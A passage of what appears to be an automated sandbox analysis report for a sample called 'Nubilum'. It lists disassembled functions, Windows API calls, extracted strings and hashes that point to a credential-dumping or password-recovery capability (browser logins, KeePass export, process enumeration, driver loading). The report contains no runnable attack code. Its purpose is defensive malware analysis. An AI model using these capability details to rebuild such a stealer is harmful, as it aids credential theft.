                          • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                          • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                          • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                          • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: AddressProc$HandleModule
                          • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll$p+vw@Fvw@Bvw
                          • API String ID: 667068680-772928780
                          • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                          • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                          • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                          • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                          APIs
                            • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                          • SetMenu.USER32(?,00000000), ref: 00411453
                          • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                          • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                          • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                          • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                          • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                          • memcpy.MSVCRT ref: 004115C8
                          • ShowWindow.USER32(?,?), ref: 004115FE
                          • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                          • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                          • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                          • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                          • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                            • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                            • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                          • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                          • API String ID: 4054529287-3175352466
                          • Opcode ID: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                          • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                          • Opcode Fuzzy Hash: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                          • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: wcscat$_snwprintfmemset$wcscpy
                          • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                          • API String ID: 3143752011-1996832678
                          • Opcode ID: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                          • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                          • Opcode Fuzzy Hash: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                          • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: _snwprintfmemset$wcscpy$wcscat
                          • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                          • API String ID: 1607361635-601624466
                          • Opcode ID: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                          • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                          • Opcode Fuzzy Hash: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                          • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: _snwprintf$memset$wcscpy
                          • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                          • API String ID: 2000436516-3842416460
                          • Opcode ID: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                          • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                          • Opcode Fuzzy Hash: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                          • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                          APIs
                            • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                            • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                            • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                            • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                            • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                            • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                            • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                            • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                            • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                            • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                            • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                          • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                          • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                          • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                          • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                          • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                          • LoadIconW.USER32(00000000,00000076), ref: 00403634
                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                          • LoadIconW.USER32(00000000,00000077), ref: 00403648
                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                          • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                          • LoadIconW.USER32(00000000,00000078), ref: 00403670
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                          • String ID:
                          • API String ID: 1043902810-0
                          • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                          • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                          • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                          • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                          APIs
                            • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                            • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
                            • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                          • memset.MSVCRT ref: 0040E380
                            • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                            • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                          • wcschr.MSVCRT ref: 0040E3B8
                          • memcpy.MSVCRT ref: 0040E3EC
                          • memcpy.MSVCRT ref: 0040E407
                          • memcpy.MSVCRT ref: 0040E422
                          • memcpy.MSVCRT ref: 0040E43D
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
                          • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                          • API String ID: 3073804840-2252543386
                          • Opcode ID: 838671905a2ba7d036ea7a94e6c5834168b5a6369d114958391e5d750bd87816
                          • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                          • Opcode Fuzzy Hash: 838671905a2ba7d036ea7a94e6c5834168b5a6369d114958391e5d750bd87816
                          • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: ??2@??3@_snwprintfwcscpy
                          • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                          • API String ID: 2899246560-1542517562
                          • Opcode ID: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                          • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                          • Opcode Fuzzy Hash: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                          • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                          APIs
                          • memset.MSVCRT ref: 0040DBCD
                          • memset.MSVCRT ref: 0040DBE9
                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                            • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                            • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                            • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                          • wcscpy.MSVCRT ref: 0040DC2D
                          • wcscpy.MSVCRT ref: 0040DC3C
                          • wcscpy.MSVCRT ref: 0040DC4C
                          • EnumResourceNamesW.KERNEL32(0040DD4B,00000004,0040D957,00000000), ref: 0040DCB1
                          • EnumResourceNamesW.KERNEL32(0040DD4B,00000005,0040D957,00000000), ref: 0040DCBB
                          • wcscpy.MSVCRT ref: 0040DCC3
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                          • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                          • API String ID: 3330709923-517860148
                          • Opcode ID: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                          • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                          • Opcode Fuzzy Hash: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                          • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                          APIs
                            • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                            • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                            • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                          • memset.MSVCRT ref: 0040806A
                          • memset.MSVCRT ref: 0040807F
                          • _wtoi.MSVCRT ref: 004081AF
                          • _wcsicmp.MSVCRT ref: 004081C3
                          • memset.MSVCRT ref: 004081E4
                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                            • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                            • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                            • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407E7E
                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407ED7
                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407EEE
                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407F01
                            • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                            • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                            • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$ChangeCloseFileFindNotificationSize_wtoi_wtoi64wcscpy
                          • String ID: logins$null
                          • API String ID: 3492182834-2163367763
                          • Opcode ID: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                          • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                          • Opcode Fuzzy Hash: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                          • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                          APIs
                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                          • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                          • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                          • memset.MSVCRT ref: 004085CF
                          • memset.MSVCRT ref: 004085F1
                          • memset.MSVCRT ref: 00408606
                          • strcmp.MSVCRT ref: 00408645
                          • _mbscpy.MSVCRT ref: 004086DB
                          • _mbscpy.MSVCRT ref: 004086FA
                          • memset.MSVCRT ref: 0040870E
                          • strcmp.MSVCRT ref: 0040876B
                          • ??3@YAXPAX@Z.MSVCRT ref: 0040879D
                          • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                          • String ID: ---
                          • API String ID: 3437578500-2854292027
                          • Opcode ID: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                          • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                          • Opcode Fuzzy Hash: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                          • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                          APIs
                          • memset.MSVCRT ref: 0041087D
                          • memset.MSVCRT ref: 00410892
                          • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                          • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                          • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                          • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                          • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                          • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                          • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                          • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                          • GetSysColor.USER32(0000000F), ref: 00410999
                          • DeleteObject.GDI32(?), ref: 004109D0
                          • DeleteObject.GDI32(?), ref: 004109D6
                          • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                          • String ID:
                          • API String ID: 1010922700-0
                          • Opcode ID: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                          • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                          • Opcode Fuzzy Hash: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                          • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                          APIs
                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                          • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                          • malloc.MSVCRT ref: 004186B7
                          • ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                          • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                          • ??3@YAXPAX@Z.MSVCRT ref: 004186E0
                          • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                          • malloc.MSVCRT ref: 004186FE
                          • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                          • ??3@YAXPAX@Z.MSVCRT ref: 00418716
                          • ??3@YAXPAX@Z.MSVCRT ref: 0041872A
                          • ??3@YAXPAX@Z.MSVCRT ref: 00418749
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: ??3@$FullNamePath$malloc$Version
                          • String ID: |A
                          • API String ID: 4233704886-1717621600
                          • Opcode ID: cf4da308e8b77386535cb07368452b59c4a465ddf093543d96db502a43b7ae5e
                          • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                          • Opcode Fuzzy Hash: cf4da308e8b77386535cb07368452b59c4a465ddf093543d96db502a43b7ae5e
                          • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: _wcsicmp
                          • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                          • API String ID: 2081463915-1959339147
                          • Opcode ID: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                          • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                          • Opcode Fuzzy Hash: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                          • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                          APIs
                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                          • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                          • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                          • FreeLibrary.KERNEL32(00000000), ref: 00413951
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
